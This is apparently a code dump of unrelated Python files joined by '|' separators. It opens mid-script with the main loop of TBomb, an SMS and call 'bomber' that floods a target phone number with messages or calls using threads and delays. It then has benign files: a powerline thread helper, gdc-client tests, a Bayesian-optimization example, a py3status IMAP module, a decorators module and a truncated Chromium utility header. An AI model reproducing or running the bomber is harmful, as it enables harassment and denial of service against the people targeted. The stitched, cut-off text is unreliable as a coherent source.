banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To ggspeedx29@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfully !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
if not str(cc + pn).isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Results With 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By Technical Yusuf !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
threaded.py
|
# vim:fileencoding=utf-8:noet
from __future__ import absolute_import
from powerline.lib.monotonic import monotonic
from threading import Thread, Lock, Event
class MultiRunnedThread(object):
daemon = True
def __init__(self):
self.thread = None
def is_alive(self):
return self.thread and self.thread.is_alive()
def start(self):
self.shutdown_event.clear()
self.thread = Thread(target=self.run)
self.thread.daemon = self.daemon
self.thread.start()
def join(self, *args, **kwargs):
if self.thread:
return self.thread.join(*args, **kwargs)
return None
class ThreadedSegment(MultiRunnedThread):
min_sleep_time = 0.1
update_first = True
interval = 1
daemon = False
def __init__(self):
super(ThreadedSegment, self).__init__()
self.run_once = True
self.crashed = False
self.crashed_value = None
self.update_value = None
self.updated = False
def __call__(self, pl, update_first=True, **kwargs):
if self.run_once:
self.pl = pl
self.set_state(**kwargs)
update_value = self.get_update_value(True)
elif not self.is_alive():
# Without restarting the thread here we would soon be getting bug
# reports like “I opened vim, but branch information is only shown
# after I move the cursor”.
#
# If running once, .update() is called in __call__.
self.start()
update_value = self.get_update_value(self.do_update_first)
else:
update_value = self.get_update_value(not self.updated)
if self.crashed:
return self.crashed_value
return self.render(update_value, update_first=update_first, pl=pl, **kwargs)
def set_update_value(self):
try:
self.update_value = self.update(self.update_value)
except Exception as e:
self.exception('Exception while updating: {0}', str(e))
self.crashed = True
except KeyboardInterrupt:
self.warn('Caught keyboard interrupt while updating')
self.crashed = True
else:
self.crashed = False
self.updated = True
def get_update_value(self, update=False):
if update:
self.set_update_value()
return self.update_value
def run(self):
if self.do_update_first:
start_time = monotonic()
while True:
self.shutdown_event.wait(max(self.interval - (monotonic() - start_time), self.min_sleep_time))
if self.shutdown_event.is_set():
break
start_time = monotonic()
self.set_update_value()
else:
while not self.shutdown_event.is_set():
start_time = monotonic()
self.set_update_value()
self.shutdown_event.wait(max(self.interval - (monotonic() - start_time), self.min_sleep_time))
def shutdown(self):
self.shutdown_event.set()
if self.daemon and self.is_alive():
# Give the worker thread a chance to shutdown, but don't block for
# too long
self.join(0.01)
def set_interval(self, interval=None):
# Allowing “interval” keyword in configuration.
# Note: Here **kwargs is needed to support foreign data, in subclasses
# it can be seen in a number of places in order to support
# .set_interval().
interval = interval or getattr(self, 'interval')
self.interval = interval
def set_state(self, interval=None, update_first=True, shutdown_event=None, **kwargs):
self.set_interval(interval)
self.shutdown_event = shutdown_event or Event()
self.do_update_first = update_first and self.update_first
self.updated = self.updated or (not self.do_update_first)
def startup(self, pl, **kwargs):
self.run_once = False
self.pl = pl
self.daemon = pl.use_daemon_threads
self.set_state(**kwargs)
if not self.is_alive():
self.start()
def critical(self, *args, **kwargs):
self.pl.critical(prefix=self.__class__.__name__, *args, **kwargs)
def exception(self, *args, **kwargs):
self.pl.exception(prefix=self.__class__.__name__, *args, **kwargs)
def info(self, *args, **kwargs):
self.pl.info(prefix=self.__class__.__name__, *args, **kwargs)
def error(self, *args, **kwargs):
self.pl.error(prefix=self.__class__.__name__, *args, **kwargs)
def warn(self, *args, **kwargs):
self.pl.warn(prefix=self.__class__.__name__, *args, **kwargs)
def debug(self, *args, **kwargs):
self.pl.debug(prefix=self.__class__.__name__, *args, **kwargs)
class KwThreadedSegment(ThreadedSegment):
update_first = True
def __init__(self):
super(KwThreadedSegment, self).__init__()
self.updated = True
self.update_value = ({}, set())
self.write_lock = Lock()
self.new_queries = []
@staticmethod
def key(**kwargs):
return frozenset(kwargs.items())
def render(self, update_value, update_first, key=None, after_update=False, **kwargs):
queries, crashed = update_value
if key is None:
key = self.key(**kwargs)
if key in crashed:
return self.crashed_value
try:
update_state = queries[key][1]
except KeyError:
with self.write_lock:
self.new_queries.append(key)
if self.do_update_first or self.run_once:
if after_update:
self.error('internal error: value was not computed even though update_first was set')
update_state = None
else:
return self.render(
update_value=self.get_update_value(True),
update_first=False,
key=key,
after_update=True,
**kwargs
)
else:
update_state = None
return self.render_one(update_state, **kwargs)
def update_one(self, crashed, updates, key):
try:
updates[key] = (monotonic(), self.compute_state(key))
except Exception as e:
self.exception('Exception while computing state for {0!r}: {1}', key, str(e))
crashed.add(key)
except KeyboardInterrupt:
self.warn('Interrupt while computing state for {0!r}', key)
crashed.add(key)
def update(self, old_update_value):
updates = {}
crashed = set()
update_value = (updates, crashed)
queries = old_update_value[0]
new_queries = self.new_queries
with self.write_lock:
self.new_queries = []
for key, (last_query_time, state) in queries.items():
if last_query_time < monotonic() < last_query_time + self.interval:
updates[key] = (last_query_time, state)
else:
self.update_one(crashed, updates, key)
for key in new_queries:
self.update_one(crashed, updates, key)
return update_value
def set_state(self, interval=None, update_first=True, shutdown_event=None, **kwargs):
self.set_interval(interval)
self.do_update_first = update_first and self.update_first
self.shutdown_event = shutdown_event or Event()
@staticmethod
def render_one(update_state, **kwargs):
return update_state
def with_docstring(instance, doc):
instance.__doc__ = doc
return instance
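# A minimal sketch of how a polling segment can be built on ThreadedSegment
# (the class name and file path below are illustrative, not part of powerline):
#
#   class LoadAvgSegment(ThreadedSegment):
#       interval = 5
#
#       def update(self, old_value):
#           # called from the worker thread every `interval` seconds
#           with open('/proc/loadavg') as f:
#               return f.read().split()[0]
#
#       def render(self, update_value, update_first, pl, **kwargs):
#           # called from the main thread with the last value update() returned
#           return update_value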
|
test_download_client.py
|
import copy
from multiprocessing import Process, cpu_count
import os
import os.path
import pytest
import tarfile
import tempfile
import time
from unittest import TestCase
from gdc_client.parcel.const import HTTP_CHUNK_SIZE, SAVE_INTERVAL
from gdc_client.parcel.download_stream import DownloadStream
import mock_server
from conftest import make_tarfile, md5, uuids
from gdc_client.download.client import GDCHTTPDownloadClient, fix_url
from gdc_client.query.index import GDCIndexClient
# default values for flask
server_host = "http://127.0.0.1"
server_port = "5000"
# same as --server flag for gdc-client
base_url = server_host + ":" + server_port
client_kwargs = {
"token": "valid token",
"n_procs": min(cpu_count(), 8),
"directory": ".",
"segment_md5sums": True,
"file_md5sum": True,
"debug": True,
"http_chunk_size": HTTP_CHUNK_SIZE,
"save_interval": SAVE_INTERVAL,
"download_related_files": True,
"download_annotations": True,
"no_auto_retry": True,
"retry_amount": 5,
"verify": True,
}
class DownloadClientTest(TestCase):
def setUp(self):
self.server = Process(target=mock_server.app.run)
self.server.start()
# give the server time to start
time.sleep(2)
def tearDown(self):
self.server.terminate()
self.server.join()
def test_fix_url(self):
index_client = GDCIndexClient(base_url)
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **client_kwargs
)
assert fix_url("api.gdc.cancer.gov") == "https://api.gdc.cancer.gov/"
assert fix_url("http://api.gdc.cancer.gov/") == "http://api.gdc.cancer.gov/"
assert fix_url("api.gdc.cancer.gov/") == "https://api.gdc.cancer.gov/"
def test_untar_file(self):
files_to_tar = ["small", "small_ann", "small_rel", "small_no_friends"]
tarfile_name = make_tarfile(files_to_tar)
index_client = GDCIndexClient(base_url)
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **client_kwargs
)
client._untar_file(tarfile_name)
for f in files_to_tar:
assert os.path.exists(f)
os.remove(f)
def test_md5_members(self):
files_to_tar = ["small", "small_ann", "small_rel", "small_no_friends"]
tarfile_name = make_tarfile(files_to_tar)
index_client = GDCIndexClient(base_url)
index_client._get_metadata(files_to_tar)
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **client_kwargs
)
client._untar_file(tarfile_name)
errors = client._md5_members(files_to_tar)
assert errors == []
for f in files_to_tar:
assert os.path.exists(f)
os.remove(f)
def test_download_tarfile(self):
# this is done after the small file sorting happens,
# so pick UUIDs that would be grouped together
files_to_dl = ["small_no_friends"]
index_client = GDCIndexClient(base_url)
index_client._get_metadata(files_to_dl)
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **client_kwargs
)
# it will remove redundant uuids
tarfile_name, errors = client._download_tarfile(files_to_dl)
assert tarfile_name is not None
assert os.path.exists(tarfile_name)
assert tarfile.is_tarfile(tarfile_name)
with tarfile.open(tarfile_name, "r") as t:
for member in t.getmembers():
m = t.extractfile(member)
contents = m.read()
assert contents.decode("utf-8") == uuids[member.name]["contents"]
os.remove(tarfile_name)
def test_download_annotations(self):
# uuid of file that has an annotation
files_to_dl = ["small_ann"]
# get annotation id out of metadata
index_client = GDCIndexClient(base_url)
index_client._get_metadata(files_to_dl)
# set expected output path for download client
with tempfile.TemporaryDirectory() as tmpdirname:
override_kwargs = copy.deepcopy(client_kwargs)
override_kwargs["directory"] = tmpdirname
# where we expect annotations to be written
os.mkdir(tmpdirname + "/{}".format(files_to_dl[0]))
output_path = tmpdirname + "/{}/annotations.txt".format(files_to_dl[0])
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **override_kwargs
)
# we mock the response from api, a gzipped tarfile with an annotations.txt in it
# this code will open that and write the annotations.txt to a particular path
# no return
client.download_annotations(files_to_dl[0])
# verify
assert os.path.exists(output_path), "failed to write annotations file"
with open(output_path, "r") as f:
contents = f.read()
assert (
contents == uuids["annotations.txt"]["contents"]
), "annotations content incorrect"
@pytest.mark.parametrize("check_segments", (True, False))
def test_no_segment_md5sums_args(check_segments):
client_args = copy.deepcopy(client_kwargs)
client_args["segment_md5sums"] = check_segments
GDCHTTPDownloadClient(uri=base_url, index_client=None, **client_args)
assert DownloadStream.check_segment_md5sums is check_segments
|
async_optimization.py
|
import time
import random
from bayes_opt import BayesianOptimization
from bayes_opt.util import UtilityFunction, Colours
import asyncio
import threading
try:
import json
import tornado.ioloop
import tornado.httpserver
from tornado.web import RequestHandler
import requests
except ImportError:
raise ImportError(
"In order to run this example you must have the libraries: " +
"`tornado` and `requests` installed."
)
def black_box_function(x, y):
"""Function with unknown internals we wish to maximize.
This is just serving as an example; for all intents and purposes, think
of the internals of this function, i.e. the process which generates its
output values, as unknown.
"""
time.sleep(random.randint(1, 7))
return -x ** 2 - (y - 1) ** 2 + 1
class BayesianOptimizationHandler(RequestHandler):
"""Basic functionality for NLP handlers."""
_bo = BayesianOptimization(
f=black_box_function,
pbounds={"x": (-4, 4), "y": (-3, 3)}
)
_uf = UtilityFunction(kind="ucb", kappa=3, xi=1)
def post(self):
"""Deal with incoming requests."""
body = tornado.escape.json_decode(self.request.body)
try:
self._bo.register(
params=body["params"],
target=body["target"],
)
print("BO has registered: {} points.".format(len(self._bo.space)), end="\n\n")
except KeyError:
pass
finally:
suggested_params = self._bo.suggest(self._uf)
self.write(json.dumps(suggested_params))
def run_optimization_app():
asyncio.set_event_loop(asyncio.new_event_loop())
handlers = [
(r"/bayesian_optimization", BayesianOptimizationHandler),
]
server = tornado.httpserver.HTTPServer(
tornado.web.Application(handlers)
)
server.listen(9009)
tornado.ioloop.IOLoop.instance().start()
def run_optimizer():
global optimizers_config
config = optimizers_config.pop()
name = config["name"]
colour = config["colour"]
register_data = {}
max_target = None
for _ in range(10):
status = name + " wants to register: {}.\n".format(register_data)
resp = requests.post(
url="http://localhost:9009/bayesian_optimization",
json=register_data,
).json()
target = black_box_function(**resp)
register_data = {
"params": resp,
"target": target,
}
if max_target is None or target > max_target:
max_target = target
status += name + " got {} as target.\n".format(target)
status += name + " will to register next: {}.\n".format(register_data)
print(colour(status), end="\n")
global results
results.append((name, max_target))
print(colour(name + " is done!"), end="\n\n")
if __name__ == "__main__":
ioloop = tornado.ioloop.IOLoop.instance()
optimizers_config = [
{"name": "optimizer 1", "colour": Colours.red},
{"name": "optimizer 2", "colour": Colours.green},
{"name": "optimizer 3", "colour": Colours.blue},
]
app_thread = threading.Thread(target=run_optimization_app)
app_thread.daemon = True
app_thread.start()
targets = (
run_optimizer,
run_optimizer,
run_optimizer
)
optimizer_threads = []
for target in targets:
optimizer_threads.append(threading.Thread(target=target))
optimizer_threads[-1].daemon = True
optimizer_threads[-1].start()
results = []
for optimizer_thread in optimizer_threads:
optimizer_thread.join()
for result in results:
print(result[0], "found a maximum value of: {}".format(result[1]))
ioloop.stop()
|
imap.py
|
"""
Display number of unread messages from IMAP account.
Configuration parameters:
allow_urgent: display urgency on unread messages (default False)
auth_scope: scope to use with OAuth2 (default 'https://mail.google.com/')
auth_token: path to where the pickled access/refresh token will be saved
after successful credential authorization.
(default '~/.config/py3status/imap_auth_token.pickle')
cache_timeout: refresh interval for this module (default 60)
client_secret: the path to the client secret file with OAuth 2.0
credentials (if None then OAuth not used) (default None)
criterion: status of emails to check for (default 'UNSEEN')
debug: log warnings (default False)
degraded_when_stale: color as degraded when updating failed (default True)
format: display format for this module (default 'Mail: {unseen}')
hide_if_zero: hide this module when no new mail (default False)
mailbox: name of the mailbox to check (default 'INBOX')
password: login password (default None)
port: number to use (default '993')
read_timeout: timeout for read(2) syscalls (default 5)
security: login authentication method: 'ssl' or 'starttls'
(starttls needs python 3.2 or later) (default 'ssl')
server: server to connect (default None)
use_idle: use IMAP4 IDLE instead of polling; requires compatible
server; uses cache_timeout for IDLE's timeout; will auto detect
when set to None (default None)
user: login user (default None)
Format placeholders:
{unseen} number of unread emails
Color options:
color_new_mail: use color when new mail arrives, default to color_good
OAuth:
OAuth2 will be used for authentication instead of a password if the
client_secret path is set.
To create a client_secret for your Google account, visit
https://console.developers.google.com/ and create an "OAuth client ID" from
the credentials tab.
This client secret enables the app (in this case, the IMAP py3status module)
to request access to a user's email. Therefore the client secret doesn't
have to be for the same Google account as the email account being accessed.
When the IMAP module first tries to access your email account a browser
window will open asking for authorization to access your email.
After authorization is complete, an access/refresh token will be saved to
the path configured in auth_token.
Requires: Using OAuth requires the google-auth and google-auth-oauthlib
libraries to be installed.
Note: the same client secret file can be used as with the py3status Google
Calendar module.
@author obb, girst
SAMPLE OUTPUT
{'full_text': 'Mail: 36', 'color': '#00FF00'}
"""
import imaplib
import os
from threading import Thread
from time import sleep
from ssl import create_default_context
from socket import setdefaulttimeout, error as socket_error
STRING_UNAVAILABLE = "N/A"
NO_DATA_YET = -1
class Py3status:
"""
"""
# available configuration parameters
allow_urgent = False
auth_scope = "https://mail.google.com/"
auth_token = "~/.config/py3status/imap_auth_token.pickle"
cache_timeout = 60
client_secret = None
criterion = "UNSEEN"
debug = False
degraded_when_stale = True
format = "Mail: {unseen}"
hide_if_zero = False
mailbox = "INBOX"
password = None
port = "993"
read_timeout = 5
security = "ssl"
server = None
use_idle = None
user = None
class Meta:
deprecated = {
"rename": [
{
"param": "new_mail_color",
"new": "color_new_mail",
"msg": "obsolete parameter use `color_new_mail`",
},
{
"param": "imap_server",
"new": "server",
"msg": "obsolete parameter use `server`",
},
]
}
def post_config_hook(self):
# class variables:
self.mail_count = NO_DATA_YET
self.connection = None
self.mail_error = None # cannot throw self.py3.error from thread
self.network_error = None
self.command_tag = (
0  # IMAP commands are tagged, so responses can be matched up to requests
)
self.idle_thread = Thread()
if self.client_secret:
self.client_secret = os.path.expanduser(self.client_secret)
self.auth_token = os.path.expanduser(self.auth_token)
if self.security not in ["ssl", "starttls"]:
raise ValueError("Unknown security protocol")
def imap(self):
# I -- acquire mail_count
if self.use_idle is not False:
if not self.idle_thread.is_alive():
sleep(
self.read_timeout
) # rate-limit thread-restarting (when network is offline)
self.idle_thread = Thread(target=self._get_mail_count)
self.idle_thread.daemon = True
self.idle_thread.start()
else:
self._get_mail_count()
response = {"cached_until": self.py3.time_in(self.cache_timeout)}
if self.mail_error is not None:
self.py3.log(self.mail_error, level=self.py3.LOG_ERROR)
self.py3.error(self.mail_error)
self.mail_error = None
# II -- format response
response["full_text"] = self.py3.safe_format(
self.format, {"unseen": self.mail_count}
)
if self.mail_count is None:
response["color"] = (self.py3.COLOR_BAD,)
response["full_text"] = self.py3.safe_format(
self.format, {"unseen": STRING_UNAVAILABLE}
)
elif self.mail_count == NO_DATA_YET:
response["full_text"] = ""
elif self.mail_count == 0 and self.hide_if_zero:
response["full_text"] = ""
elif self.mail_count > 0:
response["color"] = self.py3.COLOR_NEW_MAIL or self.py3.COLOR_GOOD
response["urgent"] = self.allow_urgent
if self.network_error is not None and self.degraded_when_stale:
response["color"] = self.py3.COLOR_DEGRADED
return response
def _check_if_idle(self, connection):
supports_idle = "IDLE" in connection.capabilities
self.use_idle = supports_idle
self.py3.log("Will use {}".format("idling" if self.use_idle else "polling"))
if self.use_idle and not supports_idle:
self.py3.error("Server does not support IDLE")
def _get_creds(self):
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.auth.exceptions import TransportError
import pickle
self.creds = None
# Open pickle file with access and refresh tokens if it exists
if os.path.exists(self.auth_token):
with open(self.auth_token, "rb") as token:
self.creds = pickle.load(token)
if not self.creds or not self.creds.valid:
try:
if self.creds and self.creds.expired and self.creds.refresh_token:
# Credentials expired but contain refresh token
self.creds.refresh(Request())
else:
# No valid credentials so open authorisation URL in browser
flow = InstalledAppFlow.from_client_secrets_file(
self.client_secret, [self.auth_scope]
)
self.creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(self.auth_token, "wb") as token:
pickle.dump(self.creds, token)
except TransportError as e:
# Treat the same as a socket_error
raise socket_error(e)
def _connection_ssl(self):
if self.client_secret:
# Use OAUTH
self._get_creds()
setdefaulttimeout(self.read_timeout)
connection = imaplib.IMAP4_SSL(self.server, int(self.port))
return connection
def _connection_starttls(self):
setdefaulttimeout(self.read_timeout)
connection = imaplib.IMAP4(self.server, int(self.port))
connection.starttls(create_default_context())
return connection
def _connect(self):
if self.security == "ssl":
self.connection = self._connection_ssl()
elif self.security == "starttls":
self.connection = self._connection_starttls()
if self.use_idle is None:
self._check_if_idle(self.connection)
# trigger a socket.timeout if any IMAP request isn't completed in time:
self.connection.socket().settimeout(self.read_timeout)
def _disconnect(self):
try:
if self.connection is not None:
if self.connection.state == "SELECTED":
self.connection.close()
self.connection.logout()
except: # noqa e722
pass
finally:
self.connection = None
def _idle(self):
"""
since imaplib doesn't support IMAP4rev1 IDLE (RFC 2177), we'll do it by hand
"""
socket = None
try:
# build a new command tag (Xnnn) as bytes:
self.command_tag = (self.command_tag + 1) % 1000
command_tag = b"X" + bytes(str(self.command_tag).zfill(3), "ascii")
# make sure we have selected anything before idling:
directories = self.mailbox.split(",")
self.connection.select(directories[0])
socket = self.connection.socket()
# send IDLE command and check response:
socket.write(command_tag + b" IDLE\r\n")
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'IDLE' in time")
# Dovecot will respond with "+ idling", Courier will return "+ entering idle mode"
# RFC 2177 (https://tools.ietf.org/html/rfc2177) only requires the "+" character.
if not response.lower().startswith("+"):
raise imaplib.IMAP4.abort(
"While initializing IDLE: {}".format(response)
)
# wait for changes (EXISTS, EXPUNGE, etc.):
socket.settimeout(self.cache_timeout)
while True:
try:
response = socket.read(4096).decode("ascii")
if response.upper().startswith("* OK"):
continue # ignore '* OK Still here'
else:
break
except socket_error: # IDLE timed out
break
finally: # terminate IDLE command gracefully
if socket is None:
return
socket.settimeout(self.read_timeout)
socket.write(b"DONE\r\n") # important! Can't query IMAP again otherwise
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'DONE' in time")
# sometimes, more messages come in between reading and DONEing; so read them again:
if response.startswith("* "):
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort(
"Server sent more continuations, but no 'DONE' ack"
)
expected_response = (command_tag + b" OK").decode("ascii")
if not response.lower().startswith(expected_response.lower()):
raise imaplib.IMAP4.abort("While terminating IDLE: " + response)
def _get_mail_count(self):
retry_counter = 0
retry_max = 3
while True:
try:
if self.connection is None:
self._connect()
if self.connection.state == "NONAUTH":
if self.client_secret:
# Authenticate using OAUTH
auth_string = "user={}\1auth=Bearer {}\1\1".format(
self.user, self.creds.token
)
self.connection.authenticate("XOAUTH2", lambda x: auth_string)
else:
# Login with user and password
self.connection.login(self.user, self.password)
tmp_mail_count = 0
directories = self.mailbox.split(",")
for directory in directories:
self.connection.select(directory)
unseen_response = self.connection.search(None, self.criterion)
mails = unseen_response[1][0].split()
tmp_mail_count += len(mails)
self.mail_count = tmp_mail_count
self.network_error = None
if self.use_idle:
self.py3.update()
self._idle()
retry_counter = 0
else:
return
except (socket_error, imaplib.IMAP4.abort, imaplib.IMAP4.readonly) as e:
if "didn't respond to 'DONE'" in str(e) or isinstance(e, socket_error):
self.network_error = str(e)
error_type = "Network"
else:
error_type = "Recoverable"
# Note: we don't reset network_error, as we want this to persist
# until we either run into a permanent error or successfully receive
# another response from the IMAP server.
if self.debug:
self.py3.log(
"{} error - {}".format(error_type, e),
level=self.py3.LOG_WARNING,
)
self._disconnect()
retry_counter += 1
if retry_counter <= retry_max:
if self.debug:
self.py3.log(
"Retrying ({}/{})".format(retry_counter, retry_max),
level=self.py3.LOG_INFO,
)
continue
break
except (imaplib.IMAP4.error, Exception) as e:
self.mail_error = "Fatal error - {}".format(e)
self._disconnect()
self.mail_count = None
retry_counter += 1
if retry_counter <= retry_max:
if self.debug:
self.py3.log(
"Will retry after 60 seconds ({}/{})".format(
retry_counter, retry_max
),
level=self.py3.LOG_INFO,
)
sleep(60)
continue
break
finally:
self.py3.update() # to propagate mail_error
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
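# A minimal py3status configuration for this module might look like the sketch below
# (module name and values are illustrative; the option names mirror the attributes
# referenced in the code above):
#
#   imap {
#       user = "me"
#       password = "secret"
#       server = "imap.example.com"
#       port = 993
#       security = "ssl"
#       mailbox = "INBOX,Work"
#       criterion = "UNSEEN"
#   }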
|
decorator.py
|
"""Decorators"""
import sys
import time
import traceback
from functools import wraps
from threading import Thread
__all__ = list(globals())
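# Snapshot of the names that exist before the decorators below are defined; combined
# with the recomputation of __all__ at the bottom of the file, only the decorators
# defined in between end up being exported.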
def main(f):
if len(sys.argv) == 1:
f()
for v in sys.argv[1:]:
f(v)
return f
def timeit(f):
@wraps(f)
def wrapper(*args, **kwargs):
s = time.time()
ret = f(*args, **kwargs)
e = time.time()
print('Running <%s>: %.4f' % (f.__name__, e - s))
return ret
return wrapper
def tracer(f):
@wraps(f)
def wrapper(*args, **kwargs):
print('Enter function:', f.__name__)
if args:
print('args:', args)
if kwargs:
print('kwargs:', kwargs)
s = time.time()
ret = f(*args, **kwargs)
e = time.time()
        print('Leave function: %s (%.4f s)' % (f.__name__, e - s))
return ret
return wrapper
def protect(f):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except Exception as e:
msg = traceback.format_exc()
print(msg, file=sys.stderr)
return msg
return wrapper
def surround(before=(), after=()):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
# print(func.__name__) # for test
[f() for f in before]
ret = func(*args, **kwargs)
[f() for f in after]
return ret
return wrapper
return decorator
def hotkey(key='F12'):
key = key.lower()
def decorator(f):
def press(key2):
if key == str(key2).split('.')[-1].lower():
f()
def th():
import pynput
with pynput.keyboard.Listener(press) as kl:
kl.join()
Thread(target=th).start()
return f
return decorator
__all__ = [k for k in globals() if k not in __all__]
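# Usage sketch (hypothetical, not part of the original module): the decorators above
# compose naturally, e.g. timing and shielding a function in one go:
#
#   @protect
#   @timeit
#   def risky_sum(n):
#       return sum(range(int(n)))
#
#   risky_sum(10 ** 6)   # prints "Running <risky_sum>: ..." and returns the sum
#   risky_sum("oops")    # prints the traceback to stderr and returns it as a string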
|
cts_utils.py
|
# Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Stage the Chromium checkout to update CTS test version."""
import contextlib
import json
import operator
import os
import re
import six
import sys
import tempfile
import threading
import urllib
import zipfile
sys.path.append(
os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir, 'third_party',
'catapult', 'devil'))
from devil.utils import cmd_helper
sys.path.append(
os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir, 'third_party',
'catapult', 'common', 'py_utils'))
from py_utils import tempfile_ext
SRC_DIR = os.path.abspath(
